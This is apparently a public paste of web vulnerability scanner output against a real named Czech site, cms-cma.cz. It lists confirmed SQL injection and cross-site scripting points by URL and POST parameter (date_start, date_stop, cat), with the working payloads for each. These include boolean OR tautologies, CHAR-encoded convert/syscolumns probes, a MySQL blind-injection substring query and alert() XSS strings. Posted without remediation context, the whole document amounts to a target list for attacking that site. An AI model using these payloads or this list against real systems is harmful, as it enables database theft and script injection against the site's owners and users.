sroub3k

cms-cma.cz

Dec 19th, 2013
  1. ||| Boolean Based SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: date_start
  8. Parameter Type: Post
  9. Attack Pattern: ' OR 'ns'='ns
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: date_stop
  16. Parameter Type: Post
  17. Attack Pattern: ' OR 'ns'='ns
  18.  
  19. ||| [High Possibility] SQL Injection
  20.  
  21. Severity: Critical
  22. Confirmation: Confirmed
  23. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  25. Parameter Name: date_start
  26. Parameter Type: Post
  27. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: date_start
  34. Parameter Type: Post
  35. Attack Pattern: '+NSFTW+'
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: date_stop
  42. Parameter Type: Post
  43. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  44.  
  45. Severity: Critical
  46. Confirmation: Confirmed
  47. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  48. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  49. Parameter Name: date_stop
  50. Parameter Type: Post
  51. Attack Pattern: '+NSFTW+'
  52.  
  53. Severity: Critical
  54. Confirmation: Confirmed
  55. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  56. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  57. Parameter Name: cat
  58. Parameter Type: Post
  59. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  60.  
  61. Severity: Critical
  62. Confirmation: Confirmed
  63. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  64. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  65. Parameter Name: cat
  66. Parameter Type: Post
  67. Attack Pattern: '+NSFTW+'
  68.  
  69. Severity: Critical
  70. Confirmation: Confirmed
  71. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  72. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  73. Parameter Name: date_start
  74. Parameter Type: Post
  75. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  76.  
  77. Severity: Critical
  78. Confirmation: Confirmed
  79. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  80. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  81. Parameter Name: date_stop
  82. Parameter Type: Post
  83. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  84.  
  85. Severity: Critical
  86. Confirmation: Confirmed
  87. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  88. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  89. Parameter Name: date_stop
  90. Parameter Type: Post
  91. Attack Pattern: '+NSFTW+'
  92.  
  93. ||| XSS (Cross-site Scripting)
  94.  
  95. Severity: Important
  96. Confirmation: Confirmed
  97. Vulnerable URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  99. Parameter Name: cat
  100. Parameter Type: Post
  101. Attack Pattern: '" ns=alert(0x000A9F)
  102.  
  103. Severity: Important
  104. Confirmation: Confirmed
  105. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  107. Parameter Name: date_start
  108. Parameter Type: Post
  109. Attack Pattern: '"><net sparker=alert(0x000AC5)>
  110.  
  111. Severity: Important
  112. Confirmation: Confirmed
  113. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  115. Parameter Name: date_stop
  116. Parameter Type: Post
  117. Attack Pattern: '" ns=alert(0x000F62)
  118.  
  119. Severity: Important
  120. Confirmation: Confirmed
  121. URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
  122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  123. Parameter Name: date_start
  124. Parameter Type: Post
  125. Attack Pattern: '"><net sparker=alert(0x001299)>
  126.  
  127. ||| MySQL Database Identified
  128.  
  129. Severity: Information
  130. Confirmation: Confirmed
  131. URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
  132. Parameter Name: date_start
  133. Parameter Type: Post
  134. Attack Pattern: -1'OR 1=1)) AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--